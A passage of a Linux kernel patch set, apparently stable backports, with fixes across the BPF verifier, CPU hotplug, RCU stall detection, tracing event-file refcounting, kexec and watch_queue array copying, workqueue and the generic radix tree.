+ 
+-		__mark_reg_known(&fake_reg, (u32)insn->imm);
++		__mark_reg_known(&fake_reg, insn->imm);
+ 		fake_reg.type = SCALAR_VALUE;
+ 		save_register_state(state, spi, &fake_reg, size);
+ 	} else if (reg && is_spillable_regtype(reg->type)) {
+@@ -10476,6 +10482,8 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		    !sanitize_speculative_path(env, insn, *insn_idx + 1,
+ 					       *insn_idx))
+ 			return -EFAULT;
++		if (env->log.level & BPF_LOG_LEVEL)
++			print_insn_state(env, this_branch->frame[this_branch->curframe]);
+ 		*insn_idx += insn->off;
+ 		return 0;
+ 	} else if (pred == 0) {
+@@ -10488,6 +10496,8 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 					       *insn_idx + insn->off + 1,
+ 					       *insn_idx))
+ 			return -EFAULT;
++		if (env->log.level & BPF_LOG_LEVEL)
++			print_insn_state(env, this_branch->frame[this_branch->curframe]);
+ 		return 0;
+ 	}
+ 
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index f8eb1825f704f..0e4d362e90825 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -1243,11 +1243,14 @@ static int cpu_down_maps_locked(unsigned int cpu, enum cpuhp_state target)
+ 	/*
+ 	 * Ensure that the control task does not run on the to be offlined
+ 	 * CPU to prevent a deadlock against cfs_b->period_timer.
++	 * Also keep at least one housekeeping cpu onlined to avoid generating
++	 * an empty sched_domain span.
+ 	 */
+-	cpu = cpumask_any_but(cpu_online_mask, cpu);
+-	if (cpu >= nr_cpu_ids)
+-		return -EBUSY;
+-	return work_on_cpu(cpu, __cpu_down_maps_locked, &work);
++	for_each_cpu_and(cpu, cpu_online_mask, housekeeping_cpumask(HK_TYPE_DOMAIN)) {
++		if (cpu != work.cpu)
++			return work_on_cpu(cpu, __cpu_down_maps_locked, &work);
++	}
++	return -EBUSY;
+ }
+ 
+ static int cpu_down(unsigned int cpu, enum cpuhp_state target)
+diff --git a/kernel/debug/debug_core.c b/kernel/debug/debug_core.c
+index d5e9ccde3ab8e..3a904d8697c8f 100644
+--- a/kernel/debug/debug_core.c
++++ b/kernel/debug/debug_core.c
+@@ -1006,6 +1006,9 @@ void kgdb_panic(const char *msg)
+ 	if (panic_timeout)
+ 		return;
+ 
++	debug_locks_off();
++	console_flush_on_panic(CONSOLE_FLUSH_PENDING);
++
+ 	if (dbg_kdb_mode)
+ 		kdb_printf("PANIC: %s\n", msg);
+ 
+diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c
+index 273a0fe7910a5..45965f13757e4 100644
+--- a/kernel/events/ring_buffer.c
++++ b/kernel/events/ring_buffer.c
+@@ -699,6 +699,12 @@ int rb_alloc_aux(struct perf_buffer *rb, struct perf_event *event,
+ 		watermark = 0;
+ 	}
+ 
++	/*
++	 * kcalloc_node() is unable to allocate buffer if the size is larger
++	 * than: PAGE_SIZE << MAX_ORDER; directly bail out in this case.
++	 */
++	if (get_order((unsigned long)nr_pages * sizeof(void *)) > MAX_ORDER)
++		return -ENOMEM;
+ 	rb->aux_pages = kcalloc_node(nr_pages, sizeof(void *), GFP_KERNEL,
+ 				     node);
+ 	if (!rb->aux_pages)
+diff --git a/kernel/irq/generic-chip.c b/kernel/irq/generic-chip.c
+index c653cd31548d0..5a452b94b6434 100644
+--- a/kernel/irq/generic-chip.c
++++ b/kernel/irq/generic-chip.c
+@@ -544,21 +544,34 @@ EXPORT_SYMBOL_GPL(irq_setup_alt_chip);
+ void irq_remove_generic_chip(struct irq_chip_generic *gc, u32 msk,
+ 			     unsigned int clr, unsigned int set)
+ {
+-	unsigned int i = gc->irq_base;
++	unsigned int i, virq;
+ 
+ 	raw_spin_lock(&gc_lock);
+ 	list_del(&gc->list);
+ 	raw_spin_unlock(&gc_lock);
+ 
+-	for (; msk; msk >>= 1, i++) {
++	for (i = 0; msk; msk >>= 1, i++) {
+ 		if (!(msk & 0x01))
+ 			continue;
+ 
++		/*
++		 * Interrupt domain based chips store the base hardware
++		 * interrupt number in gc::irq_base. Otherwise gc::irq_base
++		 * contains the base Linux interrupt number.
++		 */
++		if (gc->domain) {
++			virq = irq_find_mapping(gc->domain, gc->irq_base + i);
++			if (!virq)
++				continue;
++		} else {
++			virq = gc->irq_base + i;
++		}
++
+ 		/* Remove handler first. That will mask the irq line */
+-		irq_set_handler(i, NULL);
+-		irq_set_chip(i, &no_irq_chip);
+-		irq_set_chip_data(i, NULL);
+-		irq_modify_status(i, clr, set);
++		irq_set_handler(virq, NULL);
++		irq_set_chip(virq, &no_irq_chip);
++		irq_set_chip_data(virq, NULL);
++		irq_modify_status(virq, clr, set);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(irq_remove_generic_chip);
+diff --git a/kernel/kexec.c b/kernel/kexec.c
+index cb8e6e6f983c7..5ff1dcc4acb78 100644
+--- a/kernel/kexec.c
++++ b/kernel/kexec.c
+@@ -240,7 +240,7 @@ SYSCALL_DEFINE4(kexec_load, unsigned long, entry, unsigned long, nr_segments,
+ 		((flags & KEXEC_ARCH_MASK) != KEXEC_ARCH_DEFAULT))
+ 		return -EINVAL;
+ 
+-	ksegments = memdup_user(segments, nr_segments * sizeof(ksegments[0]));
++	ksegments = memdup_array_user(segments, nr_segments, sizeof(ksegments[0]));
+ 	if (IS_ERR(ksegments))
+ 		return PTR_ERR(ksegments);
+ 
+diff --git a/kernel/locking/test-ww_mutex.c b/kernel/locking/test-ww_mutex.c
+index 43efb2a041602..b1e25695185a4 100644
+--- a/kernel/locking/test-ww_mutex.c
++++ b/kernel/locking/test-ww_mutex.c
+@@ -466,7 +466,6 @@ retry:
+ 	} while (!time_after(jiffies, stress->timeout));
+ 
+ 	kfree(order);
+-	kfree(stress);
+ }
+ 
+ struct reorder_lock {
+@@ -531,7 +530,6 @@ out:
+ 	list_for_each_entry_safe(ll, ln, &locks, link)
+ 		kfree(ll);
+ 	kfree(order);
+-	kfree(stress);
+ }
+ 
+ static void stress_one_work(struct work_struct *work)
+@@ -552,8 +550,6 @@ static void stress_one_work(struct work_struct *work)
+ 			break;
+ 		}
+ 	} while (!time_after(jiffies, stress->timeout));
+-
+-	kfree(stress);
+ }
+ 
+ #define STRESS_INORDER BIT(0)
+@@ -564,15 +560,24 @@ static void stress_one_work(struct work_struct *work)
+ static int stress(int nlocks, int nthreads, unsigned int flags)
+ {
+ 	struct ww_mutex *locks;
+-	int n;
++	struct stress *stress_array;
++	int n, count;
+ 
+ 	locks = kmalloc_array(nlocks, sizeof(*locks), GFP_KERNEL);
+ 	if (!locks)
+ 		return -ENOMEM;
+ 
++	stress_array = kmalloc_array(nthreads, sizeof(*stress_array),
++				     GFP_KERNEL);
++	if (!stress_array) {
++		kfree(locks);
++		return -ENOMEM;
++	}
++
+ 	for (n = 0; n < nlocks; n++)
+ 		ww_mutex_init(&locks[n], &ww_class);
+ 
++	count = 0;
+ 	for (n = 0; nthreads; n++) {
+ 		struct stress *stress;
+ 		void (*fn)(struct work_struct *work);
+@@ -596,9 +601,7 @@ static int stress(int nlocks, int nthreads, unsigned int flags)
+ 		if (!fn)
+ 			continue;
+ 
+-		stress = kmalloc(sizeof(*stress), GFP_KERNEL);
+-		if (!stress)
+-			break;
++		stress = &stress_array[count++];
+ 
+ 		INIT_WORK(&stress->work, fn);
+ 		stress->locks = locks;
+@@ -613,6 +616,7 @@ static int stress(int nlocks, int nthreads, unsigned int flags)
+ 
+ 	for (n = 0; n < nlocks; n++)
+ 		ww_mutex_destroy(&locks[n]);
++	kfree(stress_array);
+ 	kfree(locks);
+ 
+ 	return 0;
+diff --git a/kernel/padata.c b/kernel/padata.c
+index 791d9cb07a501..7bef7dae3db54 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -194,7 +194,7 @@ int padata_do_parallel(struct padata_shell *ps,
+ 		*cb_cpu = cpu;
+ 	}
+ 
+-	err =  -EBUSY;
++	err = -EBUSY;
+ 	if ((pinst->flags & PADATA_RESET))
+ 		goto out;
+ 
+diff --git a/kernel/power/snapshot.c b/kernel/power/snapshot.c
+index c20ca5fb9adc8..03c4ca4048e3e 100644
+--- a/kernel/power/snapshot.c
++++ b/kernel/power/snapshot.c
+@@ -2418,8 +2418,9 @@ static void *get_highmem_page_buffer(struct page *page,
+ 		pbe->copy_page = tmp;
+ 	} else {
+ 		/* Copy of the page will be stored in normal memory */
+-		kaddr = safe_pages_list;
+-		safe_pages_list = safe_pages_list->next;
++		kaddr = __get_safe_page(ca->gfp_mask);
++		if (!kaddr)
++			return ERR_PTR(-ENOMEM);
+ 		pbe->copy_page = virt_to_page(kaddr);
+ 	}
+ 	pbe->next = highmem_pblist;
+@@ -2599,8 +2600,9 @@ static void *get_buffer(struct memory_bitmap *bm, struct chain_allocator *ca)
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+ 	pbe->orig_address = page_address(page);
+-	pbe->address = safe_pages_list;
+-	safe_pages_list = safe_pages_list->next;
++	pbe->address = __get_safe_page(ca->gfp_mask);
++	if (!pbe->address)
++		return ERR_PTR(-ENOMEM);
+ 	pbe->next = restore_pblist;
+ 	restore_pblist = pbe;
+ 	return pbe->address;
+@@ -2631,8 +2633,6 @@ int snapshot_write_next(struct snapshot_handle *handle)
+ 	if (handle->cur > 1 && handle->cur > nr_meta_pages + nr_copy_pages)
+ 		return 0;
+ 
+-	handle->sync_read = 1;
+-
+ 	if (!handle->cur) {
+ 		if (!buffer)
+ 			/* This makes the buffer be freed by swsusp_free() */
+@@ -2668,7 +2668,6 @@ int snapshot_write_next(struct snapshot_handle *handle)
+ 			memory_bm_position_reset(&orig_bm);
+ 			restore_pblist = NULL;
+ 			handle->buffer = get_buffer(&orig_bm, &ca);
+-			handle->sync_read = 0;
+ 			if (IS_ERR(handle->buffer))
+ 				return PTR_ERR(handle->buffer);
+ 		}
+@@ -2678,9 +2677,8 @@ int snapshot_write_next(struct snapshot_handle *handle)
+ 		handle->buffer = get_buffer(&orig_bm, &ca);
+ 		if (IS_ERR(handle->buffer))
+ 			return PTR_ERR(handle->buffer);
+-		if (handle->buffer != buffer)
+-			handle->sync_read = 0;
+ 	}
++	handle->sync_read = (handle->buffer == buffer);
+ 	handle->cur++;
+ 	return PAGE_SIZE;
+ }
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 4db36d543be37..8fdf076720384 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -223,7 +223,7 @@ static bool init_srcu_struct_nodes(struct srcu_struct *ssp, gfp_t gfp_flags)
+ 				snp->grplo = cpu;
+ 			snp->grphi = cpu;
+ 		}
+-		sdp->grpmask = 1 << (cpu - sdp->mynode->grplo);
++		sdp->grpmask = 1UL << (cpu - sdp->mynode->grplo);
+ 	}
+ 	smp_store_release(&ssp->srcu_size_state, SRCU_SIZE_WAIT_BARRIER);
+ 	return true;
+@@ -722,7 +722,7 @@ static void srcu_schedule_cbs_snp(struct srcu_struct *ssp, struct srcu_node *snp
+ 	int cpu;
+ 
+ 	for (cpu = snp->grplo; cpu <= snp->grphi; cpu++) {
+-		if (!(mask & (1 << (cpu - snp->grplo))))
++		if (!(mask & (1UL << (cpu - snp->grplo))))
+ 			continue;
+ 		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, cpu), delay);
+ 	}
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 917a1e43f7839..15df37bc052a9 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -31,6 +31,7 @@
+ #include <linux/bitops.h>
+ #include <linux/export.h>
+ #include <linux/completion.h>
++#include <linux/kmemleak.h>
+ #include <linux/moduleparam.h>
+ #include <linux/panic.h>
+ #include <linux/panic_notifier.h>
+@@ -1604,10 +1605,22 @@ static bool rcu_gp_fqs_check_wake(int *gfp)
+  */
+ static void rcu_gp_fqs(bool first_time)
+ {
++	int nr_fqs = READ_ONCE(rcu_state.nr_fqs_jiffies_stall);
+ 	struct rcu_node *rnp = rcu_get_root();
+ 
+ 	WRITE_ONCE(rcu_state.gp_activity, jiffies);
+ 	WRITE_ONCE(rcu_state.n_force_qs, rcu_state.n_force_qs + 1);
++
++	WARN_ON_ONCE(nr_fqs > 3);
++	/* Only countdown nr_fqs for stall purposes if jiffies moves. */
++	if (nr_fqs) {
++		if (nr_fqs == 1) {
++			WRITE_ONCE(rcu_state.jiffies_stall,
++				   jiffies + rcu_jiffies_till_stall_check());
++		}
++		WRITE_ONCE(rcu_state.nr_fqs_jiffies_stall, --nr_fqs);
++	}
++
+ 	if (first_time) {
+ 		/* Collect dyntick-idle snapshots. */
+ 		force_qs_rnp(dyntick_save_progress_counter);
+@@ -3369,6 +3382,14 @@ void kvfree_call_rcu(struct rcu_head *head, rcu_callback_t func)
+ 
+ 	WRITE_ONCE(krcp->count, krcp->count + 1);
+ 
++	/*
++	 * The kvfree_rcu() caller considers the pointer freed at this point
++	 * and likely removes any references to it. Since the actual slab
++	 * freeing (and kmemleak_free()) is deferred, tell kmemleak to ignore
++	 * this object (no scanning or false positives reporting).
++	 */
++	kmemleak_ignore(ptr);
++
+ 	// Set timer to drain after KFREE_DRAIN_JIFFIES.
+ 	if (rcu_scheduler_active == RCU_SCHEDULER_RUNNING)
+ 		schedule_delayed_monitor_work(krcp);
+diff --git a/kernel/rcu/tree.h b/kernel/rcu/tree.h
+index d4a97e40ea9c3..7b702220d81cb 100644
+--- a/kernel/rcu/tree.h
++++ b/kernel/rcu/tree.h
+@@ -365,6 +365,10 @@ struct rcu_state {
+ 						/*  in jiffies. */
+ 	unsigned long jiffies_stall;		/* Time at which to check */
+ 						/*  for CPU stalls. */
++	int nr_fqs_jiffies_stall;		/* Number of fqs loops after
++						 * which read jiffies and set
++						 * jiffies_stall. Stall
++						 * warnings disabled if !0. */
+ 	unsigned long jiffies_resched;		/* Time at which to resched */
+ 						/*  a reluctant CPU. */
+ 	unsigned long n_force_qs_gpstart;	/* Snapshot of n_force_qs at */
+diff --git a/kernel/rcu/tree_stall.h b/kernel/rcu/tree_stall.h
+index 5653560573e22..7d15b5b5a235a 100644
+--- a/kernel/rcu/tree_stall.h
++++ b/kernel/rcu/tree_stall.h
+@@ -149,12 +149,17 @@ static void panic_on_rcu_stall(void)
+ /**
+  * rcu_cpu_stall_reset - restart stall-warning timeout for current grace period
+  *
++ * To perform the reset request from the caller, disable stall detection until
++ * 3 fqs loops have passed. This is required to ensure a fresh jiffies is
++ * loaded.  It should be safe to do from the fqs loop as enough timer
++ * interrupts and context switches should have passed.
++ *
+  * The caller must disable hard irqs.
+  */
+ void rcu_cpu_stall_reset(void)
+ {
+-	WRITE_ONCE(rcu_state.jiffies_stall,
+-		   jiffies + rcu_jiffies_till_stall_check());
++	WRITE_ONCE(rcu_state.nr_fqs_jiffies_stall, 3);
++	WRITE_ONCE(rcu_state.jiffies_stall, ULONG_MAX);
+ }
+ 
+ //////////////////////////////////////////////////////////////////////////////
+@@ -170,6 +175,7 @@ static void record_gp_stall_check_time(void)
+ 	WRITE_ONCE(rcu_state.gp_start, j);
+ 	j1 = rcu_jiffies_till_stall_check();
+ 	smp_mb(); // ->gp_start before ->jiffies_stall and caller's ->gp_seq.
++	WRITE_ONCE(rcu_state.nr_fqs_jiffies_stall, 0);
+ 	WRITE_ONCE(rcu_state.jiffies_stall, j + j1);
+ 	rcu_state.jiffies_resched = j + j1 / 2;
+ 	rcu_state.n_force_qs_gpstart = READ_ONCE(rcu_state.n_force_qs);
+@@ -694,6 +700,16 @@ static void check_cpu_stall(struct rcu_data *rdp)
+ 	    !rcu_gp_in_progress())
+ 		return;
+ 	rcu_stall_kick_kthreads();
++
++	/*
++	 * Check if it was requested (via rcu_cpu_stall_reset()) that the FQS
++	 * loop has to set jiffies to ensure a non-stale jiffies value. This
++	 * is required to have good jiffies value after coming out of long
++	 * breaks of jiffies updates. Not doing so can cause false positives.
++	 */
++	if (READ_ONCE(rcu_state.nr_fqs_jiffies_stall) > 0)
++		return;
++
+ 	j = jiffies;
+ 
+ 	/*
+diff --git a/kernel/reboot.c b/kernel/reboot.c
+index 3bba88c7ffc6b..6ebef11c88760 100644
+--- a/kernel/reboot.c
++++ b/kernel/reboot.c
+@@ -74,6 +74,7 @@ void __weak (*pm_power_off)(void);
+ void emergency_restart(void)
+ {
+ 	kmsg_dump(KMSG_DUMP_EMERG);
++	system_state = SYSTEM_RESTART;
+ 	machine_emergency_restart();
+ }
+ EXPORT_SYMBOL_GPL(emergency_restart);
+diff --git a/kernel/smp.c b/kernel/smp.c
+index 06a413987a14a..63e466bb6b03a 100644
+--- a/kernel/smp.c
++++ b/kernel/smp.c
+@@ -185,6 +185,8 @@ static DEFINE_PER_CPU(struct cfd_seq_local, cfd_seq_local);
+ 
+ static ulong csd_lock_timeout = 5000;  /* CSD lock timeout in milliseconds. */
+ module_param(csd_lock_timeout, ulong, 0444);
++static int panic_on_ipistall;  /* CSD panic timeout in milliseconds, 300000 for five minutes. */
++module_param(panic_on_ipistall, int, 0444);
+ 
+ static atomic_t csd_bug_count = ATOMIC_INIT(0);
+ static u64 cfd_seq;
+@@ -343,6 +345,7 @@ static bool csd_lock_wait_toolong(struct __call_single_data *csd, u64 ts0, u64 *
+ 	}
+ 
+ 	ts2 = sched_clock();
++	/* How long since we last checked for a stuck CSD lock.*/
+ 	ts_delta = ts2 - *ts1;
+ 	if (likely(ts_delta <= csd_lock_timeout_ns || csd_lock_timeout_ns == 0))
+ 		return false;
+@@ -356,9 +359,17 @@ static bool csd_lock_wait_toolong(struct __call_single_data *csd, u64 ts0, u64 *
+ 	else
+ 		cpux = cpu;
+ 	cpu_cur_csd = smp_load_acquire(&per_cpu(cur_csd, cpux)); /* Before func and info. */
++	/* How long since this CSD lock was stuck. */
++	ts_delta = ts2 - ts0;
+ 	pr_alert("csd: %s non-responsive CSD lock (#%d) on CPU#%d, waiting %llu ns for CPU#%02d %pS(%ps).\n",
+-		 firsttime ? "Detected" : "Continued", *bug_id, raw_smp_processor_id(), ts2 - ts0,
++		 firsttime ? "Detected" : "Continued", *bug_id, raw_smp_processor_id(), ts_delta,
+ 		 cpu, csd->func, csd->info);
++	/*
++	 * If the CSD lock is still stuck after 5 minutes, it is unlikely
++	 * to become unstuck. Use a signed comparison to avoid triggering
++	 * on underflows when the TSC is out of sync between sockets.
++	 */
++	BUG_ON(panic_on_ipistall > 0 && (s64)ts_delta > ((s64)panic_on_ipistall * NSEC_PER_MSEC));
+ 	if (cpu_cur_csd && csd != cpu_cur_csd) {
+ 		pr_alert("\tcsd: CSD lock (#%d) handling prior %pS(%ps) request.\n",
+ 			 *bug_id, READ_ONCE(per_cpu(cur_csd_func, cpux)),
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 9db92a6e14636..ddcfc78e93e00 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4912,6 +4912,20 @@ int tracing_open_file_tr(struct inode *inode, struct file *filp)
+ 	if (ret)
+ 		return ret;
+ 
++	mutex_lock(&event_mutex);
++
++	/* Fail if the file is marked for removal */
++	if (file->flags & EVENT_FILE_FL_FREED) {
++		trace_array_put(file->tr);
++		ret = -ENODEV;
++	} else {
++		event_file_get(file);
++	}
++
++	mutex_unlock(&event_mutex);
++	if (ret)
++		return ret;
++
+ 	filp->private_data = inode->i_private;
+ 
+ 	return 0;
+@@ -4922,6 +4936,7 @@ int tracing_release_file_tr(struct inode *inode, struct file *filp)
+ 	struct trace_event_file *file = inode->i_private;
+ 
+ 	trace_array_put(file->tr);
++	event_file_put(file);
+ 
+ 	return 0;
+ }
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 7e6d5101bdb05..10aaafa2936dc 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -1631,6 +1631,9 @@ extern void event_trigger_unregister(struct event_command *cmd_ops,
+ 				     char *glob,
+ 				     struct event_trigger_data *trigger_data);
+ 
++extern void event_file_get(struct trace_event_file *file);
++extern void event_file_put(struct trace_event_file *file);
++
+ /**
+  * struct event_trigger_ops - callbacks for trace event triggers
+  *
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 2e3dce5e2575e..a6d2f99f847d3 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -988,26 +988,38 @@ static void remove_subsystem(struct trace_subsystem_dir *dir)
+ 	}
+ }
+ 
+-static void remove_event_file_dir(struct trace_event_file *file)
++void event_file_get(struct trace_event_file *file)
+ {
+-	struct dentry *dir = file->dir;
+-	struct dentry *child;
++	atomic_inc(&file->ref);
++}
+ 
+-	if (dir) {
+-		spin_lock(&dir->d_lock);	/* probably unneeded */
+-		list_for_each_entry(child, &dir->d_subdirs, d_child) {
+-			if (d_really_is_positive(child))	/* probably unneeded */
+-				d_inode(child)->i_private = NULL;
+-		}
+-		spin_unlock(&dir->d_lock);
++void event_file_put(struct trace_event_file *file)
++{
++	if (WARN_ON_ONCE(!atomic_read(&file->ref))) {
++		if (file->flags & EVENT_FILE_FL_FREED)
++			kmem_cache_free(file_cachep, file);
++		return;
++	}
+ 
+-		tracefs_remove(dir);
++	if (atomic_dec_and_test(&file->ref)) {
++		/* Count should only go to zero when it is freed */
++		if (WARN_ON_ONCE(!(file->flags & EVENT_FILE_FL_FREED)))
++			return;
++		kmem_cache_free(file_cachep, file);
+ 	}
++}
++
++static void remove_event_file_dir(struct trace_event_file *file)
++{
++	struct dentry *dir = file->dir;
++
++	tracefs_remove(dir);
+ 
+ 	list_del(&file->list);
+ 	remove_subsystem(file->system);
+ 	free_event_filter(file->filter);
+-	kmem_cache_free(file_cachep, file);
++	file->flags |= EVENT_FILE_FL_FREED;
++	event_file_put(file);
+ }
+ 
+ /*
+@@ -1380,7 +1392,7 @@ event_enable_read(struct file *filp, char __user *ubuf, size_t cnt,
+ 		flags = file->flags;
+ 	mutex_unlock(&event_mutex);
+ 
+-	if (!file)
++	if (!file || flags & EVENT_FILE_FL_FREED)
+ 		return -ENODEV;
+ 
+ 	if (flags & EVENT_FILE_FL_ENABLED &&
+@@ -1418,7 +1430,7 @@ event_enable_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 		ret = -ENODEV;
+ 		mutex_lock(&event_mutex);
+ 		file = event_file_data(filp);
+-		if (likely(file))
++		if (likely(file && !(file->flags & EVENT_FILE_FL_FREED)))
+ 			ret = ftrace_event_enable_disable(file, val);
+ 		mutex_unlock(&event_mutex);
+ 		break;
+@@ -1692,7 +1704,7 @@ event_filter_read(struct file *filp, char __user *ubuf, size_t cnt,
+ 
+ 	mutex_lock(&event_mutex);
+ 	file = event_file_data(filp);
+-	if (file)
++	if (file && !(file->flags & EVENT_FILE_FL_FREED))
+ 		print_event_filter(file, s);
+ 	mutex_unlock(&event_mutex);
+ 
+@@ -2810,6 +2822,7 @@ trace_create_new_event(struct trace_event_call *call,
+ 	atomic_set(&file->tm_ref, 0);
+ 	INIT_LIST_HEAD(&file->triggers);
+ 	list_add(&file->list, &tr->events);
++	event_file_get(file);
+ 
+ 	return file;
+ }
+diff --git a/kernel/trace/trace_events_filter.c b/kernel/trace/trace_events_filter.c
+index 96acc2b71ac74..86a0531efd43d 100644
+--- a/kernel/trace/trace_events_filter.c
++++ b/kernel/trace/trace_events_filter.c
+@@ -1997,6 +1997,9 @@ int apply_event_filter(struct trace_event_file *file, char *filter_string)
+ 	struct event_filter *filter = NULL;
+ 	int err;
+ 
++	if (file->flags & EVENT_FILE_FL_FREED)
++		return -ENODEV;
++
+ 	if (!strcmp(strstrip(filter_string), "0")) {
+ 		filter_disable(file);
+ 		filter = event_filter(file);
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index b0d3876c96ab2..94a2e9d21f582 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -473,7 +473,7 @@ static unsigned int trace_string(struct synth_trace_event *entry,
+ 
+ #ifdef CONFIG_ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 		if ((unsigned long)str_val < TASK_SIZE)
+-			ret = strncpy_from_user_nofault(str_field, str_val, STR_VAR_LEN_MAX);
++			ret = strncpy_from_user_nofault(str_field, (const void __user *)str_val, STR_VAR_LEN_MAX);
+ 		else
+ #endif
+ 			ret = strncpy_from_kernel_nofault(str_field, str_val, STR_VAR_LEN_MAX);
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index 28ed71d277bd7..442bb92212f2a 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -332,7 +332,7 @@ long watch_queue_set_filter(struct pipe_inode_info *pipe,
+ 	    filter.__reserved != 0)
+ 		return -EINVAL;
+ 
+-	tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
++	tf = memdup_array_user(_filter->filters, filter.nr_filters, sizeof(*tf));
+ 	if (IS_ERR(tf))
+ 		return PTR_ERR(tf);
+ 
+diff --git a/kernel/watchdog.c b/kernel/watchdog.c
+index 8e61f21e7e33e..45693fb3e08de 100644
+--- a/kernel/watchdog.c
++++ b/kernel/watchdog.c
+@@ -183,6 +183,13 @@ static DEFINE_PER_CPU(unsigned long, hrtimer_interrupts);
+ static DEFINE_PER_CPU(unsigned long, hrtimer_interrupts_saved);
+ static unsigned long soft_lockup_nmi_warn;
+ 
++static int __init softlockup_panic_setup(char *str)
++{
++	softlockup_panic = simple_strtoul(str, NULL, 0);
++	return 1;
++}
++__setup("softlockup_panic=", softlockup_panic_setup);
++
+ static int __init nowatchdog_setup(char *str)
+ {
+ 	watchdog_user_enabled = 0;
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index bc1a97ee40b21..f3b6ac232e219 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -5185,50 +5185,54 @@ static void work_for_cpu_fn(struct work_struct *work)
+ }
+ 
+ /**
+- * work_on_cpu - run a function in thread context on a particular cpu
++ * work_on_cpu_key - run a function in thread context on a particular cpu
+  * @cpu: the cpu to run on
+  * @fn: the function to run
+  * @arg: the function arg
++ * @key: The lock class key for lock debugging purposes
+  *
+  * It is up to the caller to ensure that the cpu doesn't go offline.
+  * The caller must not hold any locks which would prevent @fn from completing.
+  *
+  * Return: The value @fn returns.
+  */
+-long work_on_cpu(int cpu, long (*fn)(void *), void *arg)
++long work_on_cpu_key(int cpu, long (*fn)(void *),
++		     void *arg, struct lock_class_key *key)
+ {
+ 	struct work_for_cpu wfc = { .fn = fn, .arg = arg };
+ 
+-	INIT_WORK_ONSTACK(&wfc.work, work_for_cpu_fn);
++	INIT_WORK_ONSTACK_KEY(&wfc.work, work_for_cpu_fn, key);
+ 	schedule_work_on(cpu, &wfc.work);
+ 	flush_work(&wfc.work);
+ 	destroy_work_on_stack(&wfc.work);
+ 	return wfc.ret;
+ }
+-EXPORT_SYMBOL_GPL(work_on_cpu);
++EXPORT_SYMBOL_GPL(work_on_cpu_key);
+ 
+ /**
+- * work_on_cpu_safe - run a function in thread context on a particular cpu
++ * work_on_cpu_safe_key - run a function in thread context on a particular cpu
+  * @cpu: the cpu to run on
+  * @fn:  the function to run
+  * @arg: the function argument
++ * @key: The lock class key for lock debugging purposes
+  *
+  * Disables CPU hotplug and calls work_on_cpu(). The caller must not hold
+  * any locks which would prevent @fn from completing.
+  *
+  * Return: The value @fn returns.
+  */
+-long work_on_cpu_safe(int cpu, long (*fn)(void *), void *arg)
++long work_on_cpu_safe_key(int cpu, long (*fn)(void *),
++			  void *arg, struct lock_class_key *key)
+ {
+ 	long ret = -ENODEV;
+ 
+ 	cpus_read_lock();
+ 	if (cpu_online(cpu))
+-		ret = work_on_cpu(cpu, fn, arg);
++		ret = work_on_cpu_key(cpu, fn, arg, key);
+ 	cpus_read_unlock();
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(work_on_cpu_safe);
++EXPORT_SYMBOL_GPL(work_on_cpu_safe_key);
+ #endif /* CONFIG_SMP */
+ 
+ #ifdef CONFIG_FREEZER
+diff --git a/lib/generic-radix-tree.c b/lib/generic-radix-tree.c
+index f25eb111c0516..7dfa88282b006 100644
+--- a/lib/generic-radix-tree.c
++++ b/lib/generic-radix-tree.c
+@@ -166,6 +166,10 @@ void *__genradix_iter_peek(struct genradix_iter *iter,
+ 	struct genradix_root *r;
+ 	struct genradix_node *n;
+ 	unsigned level, i;
++
++	if (iter->offset == SIZE_MAX)
++		return NULL;
++
+ restart:
+ 	r = READ_ONCE(radix->root);
+ 	if (!r)
+@@ -184,10 +188,17 @@ restart:
+ 			(GENRADIX_ARY - 1);
+ 
+ 		while (!n->children[i]) {
++			size_t objs_per_ptr = genradix_depth_size(level);
++
++			if (iter->offset + objs_per_ptr < iter->offset) {
++				iter->offset	= SIZE_MAX;
++				iter->pos	= SIZE_MAX;
++				return NULL;
++			}
++
+ 			i++;
+-			iter->offset = round_down(iter->offset +
+-					   genradix_depth_size(level),
+-					   genradix_depth_size(level));
++			iter->offset = round_down(iter->offset + objs_per_ptr,
++						  objs_per_ptr);
+ 			iter->pos = (iter->offset >> PAGE_SHIFT) *
+ 				objs_per_page;
+ 			if (i == GENRADIX_ARY)
+diff --git a/mm/cma.c b/mm/cma.c
+index 4a978e09547a8..30b6ca30009bb 100644
+--- a/mm/cma.c
++++ b/mm/cma.c
+@@ -500,7 +500,7 @@ struct page *cma_alloc(struct cma *cma, unsigned long count,
+ 	 */
+ 	if (page) {
+ 		for (i = 0; i < count; i++)
+-			page_kasan_tag_reset(page + i);
++			page_kasan_tag_reset(nth_page(page, i));
+ 	}
+ 
+ 	if (ret && !no_warn) {
